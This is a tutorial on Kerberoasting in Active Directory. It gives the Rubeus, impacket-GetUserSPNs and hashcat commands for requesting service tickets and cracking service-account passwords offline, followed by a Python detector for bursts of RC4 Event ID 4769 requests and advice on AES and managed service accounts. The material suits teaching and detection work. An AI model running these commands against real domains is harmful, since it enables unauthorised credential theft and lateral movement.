Kerberoasting

Kerberoasting is the technique of obtaining a TGS (service ticket) for a service and then cracking the ticket offline to recover the password of the service account. This works because the service ticket is encrypted with a key derived from the service account's password, so a correct guess decrypts it. For example, in order to access an IIS service hosted within a domain, we can request the TGS from the AD and then guess the password of the IIS service account.

We will do that using Rubeus,

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

The output of this command is a hash file that can be cracked with hashcat using the following command,

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also perform the same exercise from Linux using Impacket. We will need the domain name and the credentials of a valid domain user. The following command can be used,

sudo impacket-GetUserSPNs -request -dc-ip 192.168.1.56 p42.com/john

The output can once again be cracked using hashcat.
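From the defender's side, both of the requests above leave the same trace on the domain controller: a burst of Event ID 4769 (Kerberos service ticket requested) entries from one user, for service principals belonging to user accounts rather than machine accounts, with RC4 (etype 0x17) encryption, which is the ticket type hashcat mode 13100 cracks. The following is an added detection example, not part of the original page or of Rubeus or Impacket; the event field names are taken from the 4769 event's data fields, and the sample events are constructed here rather than captured from a real domain.

```python
"""Detect Kerberoasting-style TGS request bursts in Windows Event ID 4769 data.

The sample below is constructed for this example (not real log data). Each
event carries the 4769 fields that matter for this detection: the requesting
account (TargetUserName), the service principal (ServiceName), the ticket
encryption type (TicketEncryptionType) and the client address (IpAddress).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23, the ticket type that hashcat mode 13100 cracks

# Constructed sample of 4769 events, one dict per event.
SAMPLE_EVENTS = [
    # Normal traffic: a user asks for an AES ticket to a file server (machine account).
    {"time": "2024-05-01T09:00:01", "user": "alice", "service": "FS01$", "etype": "0x12", "ip": "10.0.0.21"},
    # Kerberoasting pattern: one user pulls RC4 tickets for several user-account SPNs in seconds.
    {"time": "2024-05-01T09:15:00", "user": "john", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:15:01", "user": "john", "service": "svc_iis", "etype": "0x17", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:15:01", "user": "john", "service": "svc_backup", "etype": "0x17", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:15:02", "user": "john", "service": "svc_web", "etype": "0x17", "ip": "10.0.0.50"},
    # krbtgt tickets (TGT renewals) are not Kerberoasting and are excluded.
    {"time": "2024-05-01T09:15:03", "user": "john", "service": "krbtgt", "etype": "0x17", "ip": "10.0.0.50"},
    # A single RC4 request from another user stays below the burst threshold.
    {"time": "2024-05-01T09:20:00", "user": "bob", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.22"},
]


def is_roastable_request(ev: dict) -> bool:
    """True for an RC4 service ticket to a user-account SPN.

    Machine accounts (names ending in '$') have long random passwords and
    krbtgt requests are ordinary TGT traffic, so both are ignored.
    """
    svc = ev["service"]
    return (ev["etype"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Return one alert per (user, source IP) that requested at least
    `threshold` distinct roastable service tickets within `window`.

    Each alert lists the SPNs seen in the densest window, which tells the
    responder which service accounts now need a password rotation.
    """
    by_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_requester[(ev["user"], ev["ip"])].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))

    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()  # chronological, so every later event is >= the window start
        best = set()
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= threshold:
            alerts.append({"user": user, "ip": ip, "services": sorted(best)})
    return alerts


if __name__ == "__main__":
    for alert in find_kerberoast_bursts(SAMPLE_EVENTS):
        print(f"possible Kerberoasting by {alert['user']} from {alert['ip']}: "
              f"{', '.join(alert['services'])}")
```

Run against the sample, this flags only john's burst of four RC4 tickets and ignores alice's AES request, the krbtgt entry and bob's single request. The RC4 filter is also the reason the usual mitigation works: service accounts configured for AES only (or moved to group managed service accounts with long random passwords) no longer produce tickets of the kind mode 13100 is built to crack.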
